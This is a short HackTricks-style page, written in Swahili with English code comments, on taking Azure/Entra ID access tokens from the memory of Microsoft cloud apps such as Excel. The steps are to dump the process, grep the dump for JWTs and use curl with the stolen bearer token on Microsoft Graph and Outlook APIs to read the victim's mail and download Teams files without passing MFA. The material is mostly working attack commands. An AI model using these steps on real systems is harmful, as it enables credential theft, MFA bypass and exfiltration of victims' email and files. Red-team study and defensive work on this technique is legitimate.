Az - Processes Memory Access Token

Support HackTricks

Basic Information

Kama ilivyoelezwa katika hii video, baadhi ya programu za Microsoft zinazohusishwa na wingu (Excel, Teams...) zinaweza hifadhi alama za ufikiaji kwa maandiko wazi katika kumbukumbu. Hivyo basi, kudondosha kumbukumbu ya mchakato na kuangalia alama za JWT kunaweza kukupa ufikiaji wa rasilimali kadhaa za mwathirika katika wingu bila kupita MFA.

Hatua:

  1. Dondosha michakato ya excel iliyohusishwa na mtumiaji wa EntraID kwa kutumia chombo chako unachokipenda.

  2. Endesha: string excel.dmp | grep 'eyJ0' na pata alama kadhaa katika matokeo

  3. Pata alama zinazokuvutia zaidi na endesha zana juu yao:

# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq

# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq

# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq

## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq

## Finally, download a file from that drive:
┌──(magichk㉿black-pearl)-[~]
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'

Kumbuka kwamba aina hizi za access tokens zinaweza pia kupatikana ndani ya michakato mingine.

Support HackTricks

Last updated